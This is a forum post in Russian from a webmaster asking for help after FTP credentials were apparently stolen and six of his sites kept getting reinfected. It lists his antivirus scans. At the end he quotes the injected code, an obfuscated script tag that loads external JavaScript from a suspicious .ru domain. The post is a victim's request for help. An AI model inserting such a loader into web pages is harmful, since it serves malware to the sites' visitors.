Взломали компьютер, а после сервера с сайтами
Здравствуйте уважаемые форумчане!
Проблема вот в чем.
Недели две назад в панели вебмастера системы Яндекс, стало выскакивать сообщение о том, что один из моих сайтов, распространяет вредоносный код, но я особо не придал этому значения, так как сообщение то появлялось, то пропадало. И вот неделю назад случилась ужасная вещь, заразилось шесть моих сайтов!
Причем расположенных на разных хостингах и соответственно серверах. После удаления вредоносного кода и смены паролей, тот самый вредоносный код снова появлялся, в течении одного-двух часов.
Вообщем перерыв кучу информации я понял, что возможно троянский вирус крадет коды FTP соединения с моего локального(домашнего) компьютера, при заходе на сайт через FTP. Как раз месяц назад у меня кончилась лицензия на антивирус Касперского, и я не купил новый ключ (а зря).
В общем не буду долго рассказывать что и как я делал, скажу вкратце.
1. Проверил компьютер, с помощь утилиты от [FONT=Arial][B]Dr. Web [/B][/FONT]в безопасном режиме. Было найдено около 8-вирусов, троянов и разных нежелательных файлов.
2. Проверил компьютер с помощью AVPTool от "Касперского". Нашел еще трех троянов.
3. После чего удалил Касперского без ключа, и установил Eset NOD32. И нашел еще четыре трояна и пару десятков подозрительных файлов (я их удалил на всякий пожарный, т.к. они были не системные и на работу ПК особо не влияли). У NOD32 хороший эврестический анализ, поэтому я скачал зараженный сайт с сервера себе на компьютер проверил нодом, и нашел еще один троян(хотя искал совсем не его).
В общем после всего этого, я еще раз поменял все пароли, и на одном хостинге вроде вирус ушел (прошли уже сутки, обычно за это время вредоносный код уже возвращался). А вот на втором ни в какую.
Возможно есть еще какой-то вирус, который ворует мои коды, но почему-то антивирусники его не находят. Проверил все по вашей инструкции - [URL]http://virusinfo.info/content.php?r=136-pravila[/URL]
Файлы логов выкладываю во вложениях.
P.S. Кстати код который подзагружается в один из файлов сайта выглядит так, может кто знает как его побороть
[B][FONT=monospace]<script>[/FONT][COLOR=#000000][FONT=monospace];document.write('<s'+'c'+'ript sr'+'c=h'+'tt'+'p://por'+'nite'+'rnns.r'+'u/8'+'1.j'+'s></sc'+'ri'+'pt>');[/FONT][/COLOR][FONT=monospace]</script[/FONT][/B]
Помогите пожалуйста.